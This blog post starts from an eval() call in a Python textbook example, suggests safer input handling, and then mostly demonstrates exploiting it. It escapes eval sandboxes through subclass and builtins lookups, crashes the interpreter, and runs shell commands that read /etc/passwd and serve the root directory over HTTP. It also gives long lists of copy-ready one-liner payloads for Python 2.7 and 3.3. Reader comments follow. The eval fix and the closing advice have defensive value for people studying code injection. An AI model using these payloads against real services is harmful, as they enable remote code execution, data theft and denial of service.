For those of you just interested in the exploiting part, scroll down to “Exploiting“.
I’m reading the following book right now:
Programming Python, Fourth Edition, by Mark Lutz (O’Reilly). Copyright 2011 Mark Lutz, 978-0-596-15810-1
Example 1-22 on page 38/39 reads as following:
me$ cd PP4E/Preview/ me$ cat peopleinteract_update.py # interactive updates import shelve from person import Person fieldnames = ('name', 'age', 'job', 'pay') db = shelve.open('class-shelve') while True: key = input('\nKey? => ') if not key: break if key in db: record = db[key] # update existing record else: # or make/store new rec record = Person(name='?', age='?') # eval: quote strings for field in fieldnames: currval = getattr(record, field) newtext = input('\t[%s]=%s\n\t\tnew?=>' % (field, currval)) if newtext: setattr(record, field, eval(newtext)) db[key] = record db.close()
Of course I saw that “eval”, so I immediately stopped reading the book and started reading about how I could exploit this little Python program. The book doesn’t mention that this example could be a security problem, but it looks like they wanted to add a comment, because on page 49 it reads:
As mentioned previously, this is potentially dangerous if someone sneaks some malicious cod into our shelve, but we’ll finesse such concerns for now.
In my opinion it would be better to show a programmer how easy it is to specify a whitelist of characters (eg. say a-zA-Z0-9 and the single quote). From a security perspective, incorrect or insufficient input filtering is very dangerous. Although most of the time not the root cause, input filtering can help to prevent buffer overflows, XSS, SQL injection and most other injections. Whitelisting in Python would be done as following:
import string whitelist = string.ascii_letters + string.digits + "' " newtext = ''.join(c for c in newtext if c in whitelist)
Of course this whitelist would not cover Unicode characters. So the filter could be changed to a blacklist filter, which allows all Unicode characters, which should still be pretty safe (although blacklists are bad practice):
import string whitelist = string.ascii_letters + string.digits + "' " newtext = ''.join(c for c in newtext if c in whitelist or ord(c) > 127)
Of course this is just a workaround, the proper solution would be not to use the eval function. Instead all the input should be treated as strings and only fields with integers (age and pay) should be parsed to integers. The following code is the proper solution for the above example:
me$ cd PP4E/Preview/ me$ cat peopleinteract_update.py # interactive updates import shelve from person import Person fieldnames = ('name', 'age', 'job', 'pay') numerical_fieldnames = ('age', 'pay') db = shelve.open('class-shelve') while True: key = raw_input('\nKey? => ') if not key: break if key in db: record = db[key] # update existing record else: # or make/store new rec record = Person(name='?', age='?') for field in fieldnames: currval = getattr(record, field) newtext = raw_input('\t[%s]=%s\n\t\tnew?=>' % (field, currval)) newtext = int(newtext) if field in numerical_fieldnames else newtext if newtext: setattr(record, field, newtext) db[key] = record db.close()
Exploiting
So let’s talk about exploiting the first example. I soon found out that the example would be very easy to exploit. For example the exit function is interpreted by eval and the program quits:
me$ python3.3 peopleinteract_update.py Key? => tom [name]=56 new?=>exit() me$
So I read an article about the problem. I found this little code example, which can be used to execute something on your system (Unix example):
$ python3.3 peopleinteract_update.py Key? => tom [name]=56 new?=>__import__('os').system('echo hello, I am a command execution') hello, I am a command execution [age]=mgr new?=>
As you see, the echo command is executed and printed on the next line. I told myself that was to easy and I wanted to exploit the program in harder circumstances. As described in that article, some people try to “secure” an eval call by overwriting the __builtins__ of Python. So let’s assume the line with eval in the example 1-22 looks as following:
setattr(record, field, eval(newtext, {'__builtins__':{}}))
To clear the builtins is considered a “security measure” for a lot of people, but as described in the article above it just makes it harder to exploit, not impossible. So I wanted to try that segmentation fault technique in the article on the example. It worked well for Python 2.7:
$ python Python 2.7.3 (default, Apr 19 2012, 00:55:09) [GCC 4.2.1 (Based on Apple Inc. build 5658) (LLVM build 2335.15.00)] on darwin Type "help", "copyright", "credits" or "license" for more information. >>> s = """ ... (lambda fc=( ... lambda n: [ ... c for c in ... ().__class__.__bases__[0].__subclasses__() ... if c.__name__ == n ... ][0] ... ): ... fc("function")( ... fc("code")( ... 0,0,0,0,"KABOOM",(),(),(),"","",0,"" ... ),{} ... )() ... )() ... """ >>> eval(s, {'__builtins__':{}}) Segmentation fault: 11 me$
But they changed the constructor for Python 3 for the code object. So if you run the same code on Python 3.3 it will output that it needs 13 arguments:
$ python3.3 Python 3.3.0rc2 (default, Sep 9 2012, 04:29:34) [GCC 4.2.1 Compatible Apple Clang 3.1 (tags/Apple/clang-318.0.58)] on darwin Type "help", "copyright", "credits" or "license" for more information. >>> #same s as before ... >>> eval(s, {'__builtins__':{}}) Traceback (most recent call last): File "", line 1, in File "", line 3, in File "", line 11, in TypeError: code() takes at least 13 arguments (12 given) >>>
So because the book is about Python 3, we have to change the arguments for the code object constructor. But which arguments does it take? To find that out I started a Python 3 console and typed in the following:
>>> def foo(): pass ... >>> help(type(foo.__code__))
We get a nice description of the constructor (__init__ method) of the code object and the message that this isn’t for the faint of heart. Fine for me. We get the following argument description for the constructor:
code(argcount, kwonlyargcount, nlocals, stacksize, flags, codestring, | constants, names, varnames, filename, name, firstlineno, | lnotab[, freevars[, cellvars]])
There is no “kwonlyargcount” for Python 2.7, so with an additional 0 in the argument list and specifying two literals as “bytes” instead of “strings”, we get a Python 3 segmentation fault:
s = """ (lambda fc=( lambda n: [ c for c in ().__class__.__bases__[0].__subclasses__() if c.__name__ == n ][0] ): fc("function")( fc("code")( 0,0,0,0,0,b"KABOOM",(),(),(),"","",0,b"" ),{} )() )() """ eval(s, {'__builtins__':{}})
Now of course we want to feed it to the example program. So removing the new lines and replacing the three double quotes with one single quote we get:
s = '(lambda fc=( lambda n: [ c for c in ().__class__.__bases__[0].__subclasses__() if c.__name__ == n ][0] ): fc("function")( fc("code")( 0,0,0,0,0,b"KABOOM",(),(),(),"","",0,b"" ),{} )())()' eval(s, {'__builtins__':{}})
Ok, those two lines still work fine on the interactive Python 3 shell (and by removing one of the first 0 arguments for the code init method it will also work in Python 2.7). Can we exploit the test application now? Yes we can:
me$ python3.3 peopleinteract_update.py Key? => abc [name]=? new?=>(lambda fc=( lambda n: [ c for c in ().__class__.__bases__[0].__subclasses__() if c.__name__ == n ][0] ): fc("function")( fc("code")( 0,0,0,0,0,b"KABOOM",(),(),(),"","",0,b"" ),{} )())() Segmentation fault: 11 me$
Ok, seg faulting is fine, but what about executing real code? For that we have to go a little bit back. First, let’s try again in Python 2.7 with the cool trick described in an article on reddit. If we run the following code in a python interactive interpreter, it will show us the help page (of the help command itself):
s = """ (lambda __builtins__=([x for x in (1).__class__.__base__.__subclasses__() if x.__name__ == 'catch_warnings'][0]()._module.__builtins__): __builtins__['help'](__builtins__['help']) )() """ eval(s, {'__builtins__':{}})
So let’s see the builtins we get back with this method:
>>> a = [x for x in (1).__class__.__base__.__subclasses__() if x.__name__ == 'catch_warnings'][0]()._module.__builtins__.keys()>>> a.sort() >>> a ['ArithmeticError', 'AssertionError', 'AttributeError', 'BaseException', 'BufferError', 'BytesWarning', 'DeprecationWarning', 'EOFError', 'Ellipsis', 'EnvironmentError', 'Exception', 'False', 'FloatingPointError', 'FutureWarning', 'GeneratorExit', 'IOError', 'ImportError', 'ImportWarning', 'IndentationError', 'IndexError', 'KeyError', 'KeyboardInterrupt', 'LookupError', 'MemoryError', 'NameError', 'None', 'NotImplemented', 'NotImplementedError', 'OSError', 'OverflowError', 'PendingDeprecationWarning', 'ReferenceError', 'RuntimeError', 'RuntimeWarning', 'StandardError', 'StopIteration', 'SyntaxError', 'SyntaxWarning', 'SystemError', 'SystemExit', 'TabError', 'True', 'TypeError', 'UnboundLocalError', 'UnicodeDecodeError', 'UnicodeEncodeError', 'UnicodeError', 'UnicodeTranslateError', 'UnicodeWarning', 'UserWarning', 'ValueError', 'Warning', 'ZeroDivisionError', '_', '__debug__', '__doc__', '__import__', '__name__', '__package__', 'abs', 'all', 'any', 'apply', 'basestring', 'bin', 'bool', 'buffer', 'bytearray', 'bytes', 'callable', 'chr', 'classmethod', 'cmp', 'coerce', 'compile', 'complex', 'copyright', 'credits', 'delattr', 'dict', 'dir', 'divmod', 'enumerate', 'eval', 'execfile', 'exit', 'file', 'filter', 'float', 'format', 'frozenset', 'getattr', 'globals', 'hasattr', 'hash', 'help', 'hex', 'id', 'input', 'int', 'intern', 'isinstance', 'issubclass', 'iter', 'len', 'license', 'list', 'locals', 'long', 'map', 'max', 'memoryview', 'min', 'next', 'object', 'oct', 'open', 'ord', 'pow', 'print', 'property', 'quit', 'range', 'raw_input', 'reduce', 'reload', 'repr', 'reversed', 'round', 'set', 'setattr', 'slice', 'sorted', 'staticmethod', 'str', 'sum', 'super', 'tuple', 'type', 'unichr', 'unicode', 'vars', 'xrange', 'zip']
For example we can now print something:
s = """ (lambda __builtins__=([x for x in (1).__class__.__base__.__subclasses__() if x.__name__ == 'catch_warnings'][0]()._module.__builtins__): __builtins__['print']('THIS IS A PYTHON EVAL INTERPRETED OUTPUT') )() """ eval(s, {'__builtins__':{}})
We can also exit the interpreter form within the eval:
s = """ (lambda __builtins__=([x for x in (1).__class__.__base__.__subclasses__() if x.__name__ == 'catch_warnings'][0]()._module.__builtins__): __builtins__['exit']() )() """ eval(s, {'__builtins__':{}})
We can also delay the answer of the interpreter (takes about 10 seconds on my machine):
s = """ (lambda __builtins__=([x for x in (1).__class__.__base__.__subclasses__() if x.__name__ == 'catch_warnings'][0]()._module.__builtins__): __builtins__['sum'](__builtins__['xrange'](-999999999,99999999)) )() """ eval(s, {'__builtins__':{}})
Of course if you add some more 9s to those numbers, you can DoS the interpreter.
But if we try to read a file, the restricted mode gets hit on my machine. It seems the restricted mode is “entered when the builtins in main_dict are not the same as the interpreter’s builtins”. Here’s the corresponding code:
s = """ (lambda __builtins__=([x for x in (1).__class__.__base__.__subclasses__() if x.__name__ == 'catch_warnings'][0]()._module.__builtins__): __builtins__['print'](__builtins__['file']('/etc/passwd').read()) )() """ eval(s, {'__builtins__':{}})
The console answers with:
Traceback (most recent call last): File "", line 1, in File "", line 2, in File "", line 3, in IOError: file() constructor not accessible in restricted mode
Hmm, ok. Strange, because we can execute commands on the system:
s = """ (lambda __builtins__=([x for x in (1).__class__.__base__.__subclasses__() if x.__name__ == 'catch_warnings'][0]()._module.__builtins__): __builtins__['print'](__builtins__['__import__']('os').system('cat /etc/passwd')) )() """ eval(s, {'__builtins__':{}})
So I don’t really care if I can read files on the system, I would simply execute a reverse shell if this would be an exploitable web service. My next try was the subprocess module, but no luck:
s = """ (lambda __builtins__=([x for x in (1).__class__.__base__.__subclasses__() if x.__name__ == 'catch_warnings'][0]()._module.__builtins__): __builtins__['print'](__builtins__['__import__']('subprocess').Popen('cat /etc/passwd', shell=True)) )() """ eval(s, {'__builtins__':{}})
Traceback (most recent call last): File "", line 1, in File "", line 2, in File "", line 3, in RuntimeError: cannot unmarshal code objects in restricted execution mode
Ok, so no subprocesses and no reading of files. Let’s simply do some cool stuff with the system module, like showing /etc/passwd above. Let’s start an HTTP Server which serves a directory listing of the root directory on port 8000:
s = """ (lambda __builtins__=([x for x in (1).__class__.__base__.__subclasses__() if x.__name__ == 'catch_warnings'][0]()._module.__builtins__): __builtins__['print'](__builtins__['__import__']('os').system('cd /; python -m SimpleHTTPServer')) )() """ eval(s, {'__builtins__':{}})
I guess we’re pretty clear that from this point on we would have control over the machine, which is running the eval command. Here are the payloads (in several different versions) as one liners for Python 2.7. The file, open and fileinput payload fails because of the IOError of the restricted mode when the builtins are different, os.popen fails with a permission denied for me. The rest works on my machine:
print('THIS IS A PYTHON EVAL INTERPRETED OUTPUT') exit() sum(xrange(-999999999,99999999)) file('/etc/passwd').read() open('/etc/passwd').read() __import__['fileinput'].input('/etc/passwd') __import__['os'].system('cat /etc/passwd') __import__['os'].popen('/etc/passwd', 'r').read() __import__['os'].system('cd /; python -m SimpleHTTPServer') print(file('/etc/passwd').read()) print(open('/etc/passwd').read()) print(__import__['fileinput'].input('/etc/passwd')) print(__import__['os'].system('cat /etc/passwd')) print(__import__['os'].popen('/etc/passwd', 'r').read()) print(__import__['os'].system('cd /; python -m SimpleHTTPServer')) [x for x in (1).__class__.__base__.__subclasses__() if x.__name__ == 'catch_warnings'][0]()._module.__builtins__['print']('THIS IS A PYTHON EVAL INTERPRETED OUTPUT') [x for x in (1).__class__.__base__.__subclasses__() if x.__name__ == 'catch_warnings'][0]()._module.__builtins__['exit']() [x for x in (1).__class__.__base__.__subclasses__() if x.__name__ == 'catch_warnings'][0]()._module.__builtins__['sum']([x for x in (1).__class__.__base__.__subclasses__() if x.__name__ == 'catch_warnings'][0]()._module.__builtins__['xrange'](-999999999,99999999)) [x for x in (1).__class__.__base__.__subclasses__() if x.__name__ == 'catch_warnings'][0]()._module.__builtins__['file']('/etc/passwd').read() [x for x in (1).__class__.__base__.__subclasses__() if x.__name__ == 'catch_warnings'][0]()._module.__builtins__['open']('/etc/passwd').read() [x for x in (1).__class__.__base__.__subclasses__() if x.__name__ == 'catch_warnings'][0]()._module.__builtins__['__import__']('fileinput').input('/etc/passwd') [x for x in (1).__class__.__base__.__subclasses__() if x.__name__ == 'catch_warnings'][0]()._module.__builtins__['__import__']('os').system('cat /etc/passwd') [x for x in (1).__class__.__base__.__subclasses__() if x.__name__ == 'catch_warnings'][0]()._module.__builtins__['__import__']('os').popen('/etc/passwd', 'r').read() [x for x in (1).__class__.__base__.__subclasses__() if x.__name__ == 'catch_warnings'][0]()._module.__builtins__['__import__']('os').system('cd /; python -m SimpleHTTPServer') [x for x in (1).__class__.__base__.__subclasses__() if x.__name__ == 'catch_warnings'][0]()._module.__builtins__['print']([x for x in (1).__class__.__base__.__subclasses__() if x.__name__ == 'catch_warnings'][0]()._module.__builtins__['file']('/etc/passwd').read()) [x for x in (1).__class__.__base__.__subclasses__() if x.__name__ == 'catch_warnings'][0]()._module.__builtins__['print']([x for x in (1).__class__.__base__.__subclasses__() if x.__name__ == 'catch_warnings'][0]()._module.__builtins__['open']('/etc/passwd').read()) [x for x in (1).__class__.__base__.__subclasses__() if x.__name__ == 'catch_warnings'][0]()._module.__builtins__['print']([x for x in (1).__class__.__base__.__subclasses__() if x.__name__ == 'catch_warnings'][0]()._module.__builtins__['__import__']('fileinput').input('/etc/passwd')) [x for x in (1).__class__.__base__.__subclasses__() if x.__name__ == 'catch_warnings'][0]()._module.__builtins__['print']([x for x in (1).__class__.__base__.__subclasses__() if x.__name__ == 'catch_warnings'][0]()._module.__builtins__['__import__']('os').system('cat /etc/passwd')) [x for x in (1).__class__.__base__.__subclasses__() if x.__name__ == 'catch_warnings'][0]()._module.__builtins__['print']([x for x in (1).__class__.__base__.__subclasses__() if x.__name__ == 'catch_warnings'][0]()._module.__builtins__['__import__']('os').popen('/etc/passwd', 'r').read()) [x for x in (1).__class__.__base__.__subclasses__() if x.__name__ == 'catch_warnings'][0]()._module.__builtins__['print']([x for x in (1).__class__.__base__.__subclasses__() if x.__name__ == 'catch_warnings'][0]()._module.__builtins__['__import__']('os').system('cd /; python -m SimpleHTTPServer'))
Ok, what about Python 3 now? I haven’t found a reliable way to restore the builtins on Python 3. The following code is taken from Reddit and should work in general:
lookup = lambda n: [x for x in (1).__class__.__base__.__subclasses__() if x.__name__ == n][0] try: lookup('Codec')().decode('') except lookup('BaseException') as e: del lookup __builtins__ = e.__traceback__.tb_next.tb_frame.f_globals['__builtins__']
But because try/except blocks are not allowed to be inlined and eval can not parse multiple lines (SyntaxError: invalid syntax for try), this technique can’t be used:
s = """try: int("a") except: print(123) """ eval(s, {'__builtins__':{}})
So we would have to find another way to restore the builtins or we have to properly build a code object like we did for the segmentation fault above. I guess another thing for my TODO list.
UPDATE 19th Feb 2013:
Talked to Ned, he wrote a nice script to find builtins. And here we go for python 3.3:
>>> x = "[x for x in (1).__class__.__base__.__subclasses__() if x.__name__ == 'Pattern'][0].__init__.__globals__['__builtins__']['print']('aaaa')" >>> eval(x, {'__builtins__':{}}) aaaa >>>
So the payloads for python 3 are:
print('THIS IS A PYTHON EVAL INTERPRETED OUTPUT') exit() sum(xrange(-999999999,99999999)) file('/etc/passwd').read() open('/etc/passwd').read() __import__['fileinput'].input('/etc/passwd') __import__['os'].system('cat /etc/passwd') __import__['os'].popen('/etc/passwd', 'r').read() __import__['os'].system('cd /; python -m SimpleHTTPServer') print(file('/etc/passwd').read()) print(open('/etc/passwd').read()) print(__import__['fileinput'].input('/etc/passwd')) print(__import__['os'].system('cat /etc/passwd')) print(__import__['os'].popen('/etc/passwd', 'r').read()) print(__import__['os'].system('cd /; python -m SimpleHTTPServer')) [x for x in (1).__class__.__base__.__subclasses__() if x.__name__ == 'Pattern'][0].__init__.__globals__['__builtins__']['print']('THIS IS A PYTHON EVAL INTERPRETED OUTPUT') [x for x in (1).__class__.__base__.__subclasses__() if x.__name__ == 'Pattern'][0].__init__.__globals__['__builtins__']['exit']() [x for x in (1).__class__.__base__.__subclasses__() if x.__name__ == 'Pattern'][0].__init__.__globals__['__builtins__']['sum']([x for x in (1).__class__.__base__.__subclasses__() if x.__name__ == 'Pattern'][0].__init__.__globals__['__builtins__']['xrange'](-999999999,99999999)) [x for x in (1).__class__.__base__.__subclasses__() if x.__name__ == 'Pattern'][0].__init__.__globals__['__builtins__']['file']('/etc/passwd').read() [x for x in (1).__class__.__base__.__subclasses__() if x.__name__ == 'Pattern'][0].__init__.__globals__['__builtins__']['open']('/etc/passwd').read() [x for x in (1).__class__.__base__.__subclasses__() if x.__name__ == 'Pattern'][0].__init__.__globals__['__builtins__']['__import__']('fileinput').input('/etc/passwd') [x for x in (1).__class__.__base__.__subclasses__() if x.__name__ == 'Pattern'][0].__init__.__globals__['__builtins__']['__import__']('os').system('cat /etc/passwd') [x for x in (1).__class__.__base__.__subclasses__() if x.__name__ == 'Pattern'][0].__init__.__globals__['__builtins__']['__import__']('os').popen('/etc/passwd', 'r').read() [x for x in (1).__class__.__base__.__subclasses__() if x.__name__ == 'Pattern'][0].__init__.__globals__['__builtins__']['__import__']('os').system('cd /; python -m SimpleHTTPServer') [x for x in (1).__class__.__base__.__subclasses__() if x.__name__ == 'Pattern'][0].__init__.__globals__['__builtins__']['print']([x for x in (1).__class__.__base__.__subclasses__() if x.__name__ == 'Pattern'][0].__init__.__globals__['__builtins__']['file']('/etc/passwd').read()) [x for x in (1).__class__.__base__.__subclasses__() if x.__name__ == 'Pattern'][0].__init__.__globals__['__builtins__']['print']([x for x in (1).__class__.__base__.__subclasses__() if x.__name__ == 'Pattern'][0].__init__.__globals__['__builtins__']['open']('/etc/passwd').read()) [x for x in (1).__class__.__base__.__subclasses__() if x.__name__ == 'Pattern'][0].__init__.__globals__['__builtins__']['print']([x for x in (1).__class__.__base__.__subclasses__() if x.__name__ == 'Pattern'][0].__init__.__globals__['__builtins__']['__import__']('fileinput').input('/etc/passwd')) [x for x in (1).__class__.__base__.__subclasses__() if x.__name__ == 'Pattern'][0].__init__.__globals__['__builtins__']['print']([x for x in (1).__class__.__base__.__subclasses__() if x.__name__ == 'Pattern'][0].__init__.__globals__['__builtins__']['__import__']('os').system('cat /etc/passwd')) [x for x in (1).__class__.__base__.__subclasses__() if x.__name__ == 'Pattern'][0].__init__.__globals__['__builtins__']['print']([x for x in (1).__class__.__base__.__subclasses__() if x.__name__ == 'Pattern'][0].__init__.__globals__['__builtins__']['__import__']('os').popen('/etc/passwd', 'r').read()) [x for x in (1).__class__.__base__.__subclasses__() if x.__name__ == 'Pattern'][0].__init__.__globals__['__builtins__']['print']([x for x in (1).__class__.__base__.__subclasses__() if x.__name__ == 'Pattern'][0].__init__.__globals__['__builtins__']['__import__']('os').system('cd /; python -m SimpleHTTPServer'))
Of course now that you have Ned’s script, you can simply find other places where the builtins live, the Pattern is just one example. E.g. if one of theses strings ever gets blacklisted (think web application firewall).
Wonderful! Thank you very much for this article! I got some new Python exploitation tricks 🙂
nice article ! thank you very much.
Great article! Thank you!
Pingback: Exploiting Python Code Injection in Web Applications – My Blog
python module evalidate (pip3 install evalidate) solves this problem.
It parses untrusted user code into Abstract Syntax Tree (AST) and checks each node. Code is evaluated then only if it consist only of safe nodes. Example:
>>> evalidate.safeeval(‘a+1’, {‘a’:100})
(True, 101)
>>> evalidate.safeeval(“os.system(‘clear’)”, {‘a’:100})
(False, ‘Validation error: Operaton type Call is not allowed’)
Disclaimer: I’m author of this module.
I’d like to emphasise that I did not check your library for security issues and I’m not recommending to rely on any third-party library (and neither on yours) to do any code eval at all, as way too many of the libraries are flawed heavily because you need to know a lot of python features and internals. This is a mine field.
In most cases I think using ast.literal_eval or using a json library is totally sufficient.